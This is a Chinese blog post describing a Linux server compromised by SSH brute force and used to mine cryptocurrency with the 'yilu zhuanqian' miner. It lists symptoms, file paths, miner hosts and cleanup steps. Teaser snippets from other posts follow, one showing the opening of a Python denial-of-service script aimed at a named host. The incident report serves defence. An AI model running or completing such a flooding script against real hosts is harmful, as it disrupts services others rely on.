xig,Linux惡意攻擊指令碼程序之一

2021-09-01 09:10:38 字數 2474 閱讀 3685

首先說明一點,當你在搜尋"xig"的時候,我可以肯定你的伺服器已經被惡意攻擊了,

原因很簡單:絕大部分都是因為伺服器連線密碼設定過於簡單。

回去改個密碼再刪刪檔案什麼的基本就解決了,這種小白挖礦程式一般都只是占用伺服器資源挖挖礦什麼的,其他危害倒不嚴重。

由於之前我搜尋「xig」的時候沒遇到什麼有針對性的文章,估計是已經很少有人犯這種錯誤了,但想想還是把細節寫出來,引以為戒吧。

首先肯定是伺服器執行發生了異常,具體表現為:

1、cpu占用極高,一般都是80%,伺服器負載基本是100%了,出現大量殭屍程序、休眠程序

2、後台大量可疑程序,比如xig,xige,mservice什麼的,反正一大堆,用ps -ef命令能有好幾頁

3、有這些東西在後台跑著,伺服器反應肯定會被拖慢,所以伺服器在處理自己發起的請求時,給出響應的時間要比平時長得多。

如果你在用寶塔面板管理著伺服器的話,發現異常就簡單得多了:

一、攻擊目的

攻擊者通過 ssh 暴力破解控制的裝置來進行 ddos 攻擊,主要利用被攻擊的伺服器的資源進行虛擬貨幣的挖掘,從而謀取利益。也就是挖挖位元幣、門羅幣什麼的,俗稱挖礦

自動化 ssh 暴力破解攻擊的無差別自動化攻擊方式使得開放 ssh 服務的 linux 伺服器(包括傳統伺服器、雲伺服器等)、物聯網裝置等成為主要攻擊目標。

二、攻擊字典:

對統計的 ssh 暴力破解登入資料分析發現

1、接近 99% 的 ssh 暴力破解攻擊是針對 admin 和 root 使用者名稱;

2、攻擊最常用弱密碼前三名分別是 admin、 password、 root, 佔攻擊次數的 98.70%;

約 85% 的 ssh 暴力破解攻擊使用了 admin / admin 與 admin / password 這兩組使用者名稱密碼組合。

來自網路。

三、攻擊方式

攻擊流程

來自網路。

自動化暴力破解攻擊成功後,常使用 wget /curl 來植入惡意檔案。linux用的wget,少部分攻擊者還會在 http 伺服器上,同時執行 tftp 和 ftp 服務,並在植入惡意檔案時,執行多個不同的植入命令。這樣即使在 http 服務不可用的情況下,仍可以通過 tftp 或 ftp 植入惡意檔案。

本次被植入的惡意指令碼是   「一路賺錢」挖礦惡意程式,主要利用被控制的裝置挖掘虛擬貨幣,這個 64 位的 linux 挖礦惡意程式部署指令碼執行後,會植入「一路賺錢」 64 位 linux 版本的挖礦惡意程式壓縮包yilu.tgz,並解壓到 /opt 目錄下產生資料夾yilu,然後執行主程式 mservice,註冊為 linux 系統服務,服務名為 yiluzhuanqianser。該資料夾中有三個可執行檔案 mservice / xige / xig,均被反病毒引擎檢測出是挖礦類的惡意樣本。根據配置檔案可知, mservice 負責賬號登入 / 裝置註冊 / 上報實時資訊,而 xige 和 xig 負責挖礦,xige 挖以太幣 eth,xig 挖門羅幣 xmr。

這些檔案在opt/yilu裡面,只要你被攻擊了,在這些路徑下一定能找到。

「一路賺錢」的 64 位 linux 版本挖礦惡意程式資料夾內容如下:

來自網路。

xcn1.yiluzhuanqian.com:80

ecn1.yiluzhuanqian.com:38008

我這次被攻擊對方用的是第乙個位址

四、解決方案

本人能力有限,給出的解決方案只能是暫時能用,具體的各位再查查吧。

修改伺服器遠端連線密碼。密碼、密碼、密碼!!!別偷懶,越複雜越好。

強制殺死xig、mservice、xige等相關程序

刪除可疑檔案

禁止對方相關ip的訪問許可權

重啟

本人能力實在有限,不然真想打回去。

網通惡意攻擊寬頻使用者

今天晚上突然不能上網了,以為adsl貓出了問題 http登入adsl管理介面 沒想到登入過程也是異常艱難 登入後時斷時續,後來又登入了幾次 終於把貓撥號,改為windows撥號 心想可能是資料量太大,貓無法處理,那改為橋接,我自己撥號總可以吧 沒想到這一改,發現乙個大問題 還沒有撥號 卻有大量的資料...

2023年惡意軟體攻擊趨勢

2016 2020年中國網路安全行業市場規模 單位 億元 自2016年以來,公安部每年開展針對關鍵資訊基礎設施的實戰攻防演習,被稱為 護網行動 隨著等保2.0時代的到來,2019年 護網行動 涉及範圍擴大至工信 安全 武警 交通 鐵路 民航 能源 新聞廣電 電信運營商等單位,等保2.0落地給網路安全...

dos攻擊指令碼

usr bin env python import socket import time import threading pressure test,ddos tool max conn 20000 port 80 host www.zhaihongyu.tech 在雙引號裡輸入對方ip或網域名稱...